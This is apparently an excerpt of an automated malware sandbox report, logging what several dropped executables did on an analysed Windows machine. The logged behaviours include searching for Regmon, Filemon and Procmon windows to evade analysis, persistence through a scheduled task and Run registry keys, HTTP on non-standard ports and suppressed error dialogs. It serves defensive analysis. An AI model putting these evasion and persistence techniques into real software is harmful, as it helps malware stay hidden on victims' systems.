Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\random.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b3d465ea47.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b3d465ea47.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50233

Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
